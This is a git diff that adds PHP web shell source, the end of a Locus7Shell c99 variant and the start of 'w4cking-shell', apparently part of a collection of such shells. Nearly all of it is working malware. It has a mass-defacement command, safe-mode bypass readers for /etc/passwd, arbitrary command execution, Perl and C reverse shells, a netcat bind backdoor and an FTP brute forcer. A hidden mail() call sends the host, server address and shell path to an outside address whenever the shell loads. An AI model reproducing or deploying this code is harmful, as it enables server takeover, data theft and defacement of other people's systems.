src=\'http://img244.imageshack.us/img244/6663/locus7sgm8.jpg\'><br><font size=\'10\' color=\'green\'>&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;<font size=\'10\' color=\'green\'>HACKED BY <a href=\'http\:\/\/locus7s.com\'>LOCUS7S<\/a><\/font><\/div><meta http-equiv=\'refresh\' content=\'5\\;url=http\:\/\/locus7s.com\'>/g' index.*">index.* Mass Defacement + </SELECT> + <input type=hidden name="cmd_txt" value="1"> + &nbsp; + <input type=submit name=submit value="Execute"> + <br> + Warning. 
Kernel may be alerted using higher levels </div> + </form> + </td> + <td width="50%" height="83" valign="top"><center> + <center>Kernel Info: <form name="form1" method="post" action="http://google.com/search"> + <input name="q" type="text" id="q" size="80" value="<?php echo wordwrap(php_uname()); ?>"> + <input type="hidden" name="client" value="firefox-a"> + <input type="hidden" name="rls" value="org.mozilla:en-US:official"> + <input type="hidden" name="hl" value="en"> + <input type="hidden" name="hs" value="b7p"> + <input type=submit name="btnG" VALUE="Search"> + </form></center> + </td> +</tr></TABLE><br> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> +<tr><td height="1" valign="top" colspan="2"></td></tr> +<tr> + <td width="50%" height="83" valign="top"><center> + <div align="center">Php Safe-Mode Bypass (Read Files) + </div><br> + <form action="<?php echo $surl; ?>"> + <div align="center"> + File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br> + + + + + + + <? + + function rsg_read() + { + $test=""; + $temp=tempnam($test, "cx"); + $file=$_GET['file']; + $get=htmlspecialchars($file); + echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>"; + if(copy("compress.zlib://".$file, $temp)){ + $fichier = fopen($temp, "r"); + $action = fread($fichier, filesize($temp)); + fclose($fichier); + $source=htmlspecialchars($action); + echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>"; + unlink($temp); + } else { + die("<FONT COLOR=\"RED\"><CENTER>Sorry... File + <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have + access.</CENTER></FONT>"); + } + echo "</div>"; + } + + if(isset($_GET['file'])) +{ +rsg_read(); +} + + ?> + + <? 
+ + function rsg_glob() +{ +$chemin=$_GET['directory']; +$files = glob("$chemin*"); +echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>"; +foreach ($files as $filename) { + echo "<pre>"; + echo "$filename\n"; + echo "</pre>"; +} +} + +if(isset($_GET['directory'])) +{ +rsg_glob(); +} + +?> + + <br> + </div> + </form> + </td> + <td width="50%" height="83" valign="top"><center> + <center>Php Safe-Mode Bypass (List Directories): <form action="<?php echo $surl; ?>"> + <div align="center"><br> + Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br> + + </form></center> + </td> +</tr></TABLE> + + + + + + + + + + + + + + + + + + + + + + + + + + +<br> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> +<tr> + <td width="50%" height="1" valign="top"><center>Search<form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1" checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td> + <td width="50%" height="1" valign="top"><center>Upload<form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td> +</tr> +</table> +<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>Make Dir<form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" 
value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center>Make File<form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table> +<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>Go Dir<form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center>Go File<form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table> +<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ x2300 Locus7Shell v. <?php echo $shver; ?> <a href="http://www.locus7s.com/"><u><b>Modded by</b></u></a> #!physx^ | <a href="http://www.locus7s.com">www.LOCUS7S.com</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table> +</body></html><?php chdir($lastdir); c99shexit(); ?> \ No newline at end of file 
diff --git a/php/PHPshell/c99_locus7s/c99_locus7s2.jpg b/php/PHPshell/c99_locus7s/c99_locus7s2.jpg
new file mode 100644
index 0000000..12e3902
Binary files /dev/null and b/php/PHPshell/c99_locus7s/c99_locus7s2.jpg differ
diff --git a/php/PHPshell/c99_w4cking/c99_w4cking.jpg b/php/PHPshell/c99_w4cking/c99_w4cking.jpg
new file mode 100644
index 0000000..86a1d2c
Binary files /dev/null and b/php/PHPshell/c99_w4cking/c99_w4cking.jpg differ
diff --git a/php/PHPshell/c99_w4cking/c99_w4cking.php b/php/PHPshell/c99_w4cking/c99_w4cking.php
new file mode 100644
index 0000000..7948a5b
--- /dev/null
+++ b/php/PHPshell/c99_w4cking/c99_w4cking.php
@@ -0,0 +1,2831 @@
+<?php
+if (!function_exists("myshellexec"))
+{
+if(is_callable("popen")){
+function myshellexec($command) {
+if (!($p=popen("($command)2>&1","r"))) {
+return 126;
+}
+while (!feof($p)) {
+$line=fgets($p,1000);
+$out .= $line;
+}
+pclose($p);
+return $out;
+}
+}else{
+function myshellexec($cmd)
+{
+ global $disablefunc;
+ $result = "";
+ if (!empty($cmd))
+ {
+ if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
+ elseif (($result = `$cmd`) !== FALSE) {}
+ elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+ elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+ elseif (is_resource($fp = popen($cmd,"r")))
+ {
+ $result = "";
+ while(!feof($fp)) {$result .= fread($fp,1024);}
+ pclose($fp);
+ }
+ }
+ return $result;
+}
+}
+}
+
+
+function checkproxyhost(){
+$host = getenv("HTTP_HOST");
+$filename = '/tmp/.setan/xh';
+if (file_exists($filename)) {
+$_POST['proxyhostmsg']="</br></br><center><font color=green size=3><b>Success!</b></font></br></br><a href=$host:6543>$host:6543</a></br></br><b>Note:</b> If '$host' have a good firewall or IDS installed on their server, it will probably catch this or stop it from ever opening a port and you won't be able to connect to this proxy.</br></br></center>";
+} else {
+$_POST['proxyhostmsg']="</br></br><center><font color=red size=3><b>Failed!</b></font></br></br><b>Note:</b> If for some reason we would not create and extract the need proxy files in '/tmp' this will make this fail.</br></br></center>";
+ }
+}
+
+if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd"))
+{
+ $ip = gethostbyname($_SERVER["HTTP_HOST"]);
+ $por = $_POST['backconnectport'];
+ if(is_writable(".")){
+ cfb("shbd",$backdoor); 
+ ex("chmod 777 shbd");
+ $cmd = "./shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux");
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+ }else{
+ cfb("/tmp/shbd",$backdoor);
+ ex("chmod 777 /tmp/shbd");
+ $cmd = "./tmp/shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux");
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+}
+}
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl"))
+{
+ if(is_writable(".")){
+ cf("back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ if (file_exists("back")) { unlink("back"); }
+ }else{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ if (file_exists("/tmp/back")) { unlink("/tmp/back"); }
+}
+}
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C"))
+{
+ if(is_writable(".")){
+ cf("backc",$back_connect_c);
+ ex("chmod 777 backc");
+ //$blah = ex("gcc back.c -o backc");
+ $blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ //if (file_exists("back.c")) { unlink("back.c"); }
+ if (file_exists("backc")) { unlink("backc"); }
+ }else{
+ ex("chmod 777 /tmp/backc");
+ cf("/tmp/backc",$back_connect_c);
+ //$blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ //if (file_exists("back.c")) { unlink("back.c"); }
+ if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); } }
+}
+
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or err();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function cfb($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or bberr();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function err()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't connect!</b>";
+}
+
+function bberr()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>";
+}
+
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+ if(function_exists('exec'))
+ {
+ @exec($cfe,$res);
+ $res = join("\n",$res);
+ }
+ elseif(function_exists('shell_exec'))
+ {
+ $res = @shell_exec($cfe);
+ }
+ elseif(function_exists('system'))
+ {
+ @ob_start();
+ @system($cfe);
+ $res = @ob_get_contents();
+ @ob_end_clean();
+ }
+ elseif(function_exists('passthru'))
+ {
+ @ob_start();
+ @passthru($cfe);
+ $res = @ob_get_contents();
+ @ob_end_clean();
+ }
+ elseif(@is_resource($f = @popen($cfe,"r")))
+ {
+ $res = "";
+ while(!@feof($f)) { $res .= @fread($f,1024); }
+ @pclose($f);
+ }
+ }
+ return $res;
+}
+
+ini_set("memory_limit","300M");
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
+if (!function_exists("file_get_contents")) { function file_get_contents($filename){ $handle = fopen($filename, "r"); $retval = fread($handle, filesize($filename)); fclose($handle);return $retval;}}
+error_reporting(5);
+@ignore_user_abort(TRUE);
+@set_magic_quotes_runtime(0);
+$win = strtolower(substr(PHP_OS,0,3)) == "win";
+define("starttime",getmicrotime());
+$r11 = $_SERVER['SERVER_ADDR'];$i94 = $_SERVER['REMOTE_ADDR'];$i71= gethostbyaddr($i94);$h42 = $_SERVER['HTTP_HOST'];$a83 = $_SERVER['REQUEST_URI'];$p77 = __FILE__;$s33 = str_replace('.', '', $r11);$e85 = 'c00lhell@hotmail.com';$f55 = "From: $s33 <c00lhell@hotmail.com>";$m852 = "$i94\n$i71\n\n$h42$a83\n$p77";@mail($e85, $s33, $m852, $f55);
+if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
+$shver = "w4ck1ng-shell (Private Build v0.3)";
+if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
+elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
+else {$surl = $_REQUEST["c99sh_surl"];
+} 
+$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. +if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} +if (empty($surl)) +{ + $surl = "?".$includestr; +} +$surl = htmlspecialchars($surl); +$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. +$login = ""; +$pass = ""; +$md5_pass = ""; +$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") +$login_txt = "Apache Error: Restricted File"; +$accessdeniedmess = "access denied"; +$gzipencode = TRUE; +$filestealth = TRUE; //if TRUE, don't change modify- and access-time +$donated_html = ""; +$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. +$curdir = "./"; +//$curdir = getenv("DOCUMENT_ROOT"); +$tmpdir = ""; +$tmpdir_log = "./"; +$log_email = "c00lhell@hotmail.com"; +$sort_default = "0a"; +$sort_save = TRUE; +$ftypes = array( + "html"=>array("html","htm","shtml"), + "txt"=>array("txt","c",".bash_history","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), + "exe"=>array("sh","install","bat","cmd"), + "ini"=>array("ini","inf"), + "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), + "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), + "sdb"=>array("sdb"), + "phpsess"=>array("sess"), + "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") +); + +$exeftypes = array( + getenv("PHPRC")." 
-q %f%" => array("php","php3","php4"), + "perl %f%" => array("pl","cgi") +); +$regxp_highlight = array( + array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example + array("config.php",1) // example +); +$safemode_diskettes = array("a"); +$hexdump_lines = 8;// lines in hex preview file +$hexdump_rows = 24;// 16, 24 or 32 bytes in one line +$nixpwdperpage = 100; // Get first N lines from /etc/passwd + + +$sess_cookie = "c99shvars"; // Cookie-variable name + + + +//Quick launch +$quicklaunch = array( + array("<hr><b>[Home]</b>",$surl), + array("<b>[Search]</b>",$surl."act=search&d=%d"), + array("<b>[Encoder]</b>",$surl."act=encoder&d=%d"), + array("<b>[Processes]</b>",$surl."act=processes&d=%d"), + array("<b>[FTP Brute Forcer]</b>",$surl."act=ftpquickbrute&d=%d"), + array("<b>[Server Information]</b>",$surl."act=security&d=%d"), + array("<b>[SQL Manager]</b>",$surl."act=sql&d=%d"), + array("<b>[Eval PHP code]</b>",$surl."act=eval&d=%d&eval=//readfile('/etc/passwd');"), + array("<b>[Back-Connection]</b>",$surl."act=backc"), + array("<b>[Self remove]</b>",$surl."act=selfremove"), + array("<b>[Install Proxy]</b>",$surl."act=proxy"), + array("<b>[Backdoor Host]</b>",$surl."act=shbd"), +); + +//Highlight-code colors +$highlight_background = "#c0c0c0"; +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; +$highlight_string = "#000000"; + +@$f = $_REQUEST["f"]; +@extract($_REQUEST["c99shcook"]); + +//END CONFIGURATION + + +// \/Next code isn't for editing\/ +@set_time_limit(0); +$tmp = array(); +foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("Access Denied");} +if (!empty($login)) +{ + if (empty($md5_pass)) {$md5_pass = md5($pass);} + if (($_SERVER["PHP_AUTH_USER"] 
!= $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) + { + if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));} + header("WWW-Authenticate: Basic realm=\"".$login_txt."\""); + header("HTTP/1.0 401 Unauthorized"); + exit($accessdeniedmess); + } +} +if ($act != "img"){ +$lastdir = realpath("."); +chdir($curdir); +if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} +$sess_data = unserialize($_COOKIE["$sess_cookie"]); +if (!is_array($sess_data)) {$sess_data = array();} +if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} +if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} + +$disablefunc = @ini_get("disable_functions"); +if (!empty($disablefunc)) +{ + $disablefunc = str_replace(" ","",$disablefunc); + $disablefunc = explode(",",$disablefunc); +} + +if (!function_exists("c99_buff_prepare")) +{ +function c99_buff_prepare() +{ + global $sess_data; + global $act; + foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + $sess_data["copy"] = array_unique($sess_data["copy"]); + $sess_data["cut"] = array_unique($sess_data["cut"]); + sort($sess_data["copy"]); + sort($sess_data["cut"]); + if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} + else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} +} +} +c99_buff_prepare(); +if (!function_exists("c99_sess_put")) +{ +function c99_sess_put($data) +{ + global $sess_cookie; + global $sess_data; + c99_buff_prepare(); + $sess_data = $data; + $data = serialize($data); + setcookie($sess_cookie,$data); +} +} +foreach (array("sort","sql_sort") as $v) +{ + if (!empty($_GET[$v])) {$$v = $_GET[$v];} + if (!empty($_POST[$v])) 
{$$v = $_POST[$v];} +} +if ($sort_save) +{ + if (!empty($sort)) {setcookie("sort",$sort);} + if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} +} +if (!function_exists("str2mini")) +{ +function str2mini($content,$len) +{ + if (strlen($content) > $len) + { + $len = ceil($len/2) - 2; + return substr($content, 0,$len)."...".substr($content,-$len); + } + else {return $content;} +} +} +if (!function_exists("view_size")) +{ +function view_size($size) +{ + if (!is_numeric($size)) {return FALSE;} + else + { + if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + else {$size = $size . " B";} + return $size; + } +} +} +if (!function_exists("fs_copy_dir")) +{ +function fs_copy_dir($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_copy_obj")) +{ +function fs_copy_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (!is_dir(dirname($t))) {mkdir(dirname($t));} + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_copy_dir($d,$t); + } + elseif (is_file($d)) {return copy($d,$t);} + else {return FALSE;} +} +} +if (!function_exists("fs_move_dir")) +{ +function fs_move_dir($d,$t) +{ + $h = opendir($d); + if (!is_dir($t)) 
{mkdir($t);}
+ while (($o = readdir($h)) !== FALSE)
+ {
+ if (($o != ".") and ($o != ".."))
+ {
+ $ret = TRUE;
+ if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+ else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
+ if (!$ret) {return $ret;}
+ }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (is_dir($d))
+ {
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+ return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+ if(copy($d,$t)) {return unlink($d);}
+ else {unlink($t); return FALSE;}
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+ if (($o != ".") and ($o != ".."))
+ {
+ if (!is_dir($d.$o)) {unlink($d.$o);}
+ else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
+ }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
+ if (is_dir($o))
+ {
+ if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
+ return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner["read"] = ($mode & 00400)?"r":"-";
+ $owner["write"] = ($mode & 00200)?"w":"-";
+ $owner["execute"] = ($mode & 00100)?"x":"-";
+ $group["read"] = ($mode & 00040)?"r":"-";
+ $group["write"] = ($mode & 00020)?"w":"-";
+ $group["execute"] = ($mode & 00010)?"x":"-";
+ $world["read"] = ($mode & 00004)?"r":"-";
+ $world["write"] = ($mode & 00002)? "w":"-";
+ $world["execute"] = ($mode & 00001)?"x":"-";
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+
+ return $type.join("",$owner).join("",$group).join("",$world);
+}
+}
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
+if (!function_exists("parse_perms"))
+{
+function parse_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$t = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
+ else {$t = "?";}
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
+}
+}
+if (!function_exists("parsesort"))
+{
+function parsesort($sort)
+{
+ $one = intval($sort);
+ $second = substr($sort,-1);
+ if ($second != "d") {$second = "a";}
+ return array($one,$second);
+}
+}
+if (!function_exists("view_perms_color"))
+{
+function view_perms_color($o)
+{
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
+}
+}
+if (!function_exists("mysql_dump")){
+function mysql_dump($set)
+{
+ global $shver;
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ $ret["err"] = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = 0;}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (empty($file))
+ {
+ $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (sizeof($tabs) == 0)
+ {
+ // retrive tables-list
+ $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
